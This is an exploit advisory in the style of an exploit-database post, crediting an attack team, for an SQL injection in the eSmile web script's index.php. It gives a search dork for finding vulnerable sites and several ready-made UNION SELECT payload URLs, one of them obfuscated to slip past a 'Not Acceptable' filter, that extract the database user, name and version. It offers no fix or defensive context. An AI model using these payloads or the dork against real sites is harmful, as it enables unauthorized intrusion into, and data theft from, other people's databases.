24 lines
No EOL
1 KiB
Text
24 lines
No EOL
1 KiB
Text
eSmile (index.php) Sql Injection Vulnerability
|
|
==============================================================
|
|
|
|
####################################################################
|
|
.:. Author : AtT4CKxT3rR0r1ST [F.Hack@w.cn]
|
|
.:. Team : Sec Attack Team
|
|
.:. Home : www.sec-attack.com/vb
|
|
.:. Script : eSmile
|
|
.:. Bug Type : Sql Injection[Mysql]
|
|
.:. Dork : "Powered by: eSmile"
|
|
|
|
####################################################################
|
|
|
|
===[ Exploit ]===
|
|
|
|
www.site.com/index.php?do=show&cid=null[Sql Injection]
|
|
|
|
www.site.com/index.php?do=show&cid=null'/**/and/**/1=2/**/union/**/select/**/111,222,333,444,555,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- -
|
|
www.site.com/index.php?do=show&cid=null'/**/and/**/1=2/**/union/**/select/**/111,222,333,444,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),666-- -
|
|
|
|
T0 Bypass Not Acceptable
|
|
|
|
|
|
www.site.com/index.php?do=show&cid=-NULL'/**/UNION/**/ALL/**/SELECT/**/111,222,333,444,555,CONCAT_WS(CHAR(32,58,32),user(),database(),version())-- - |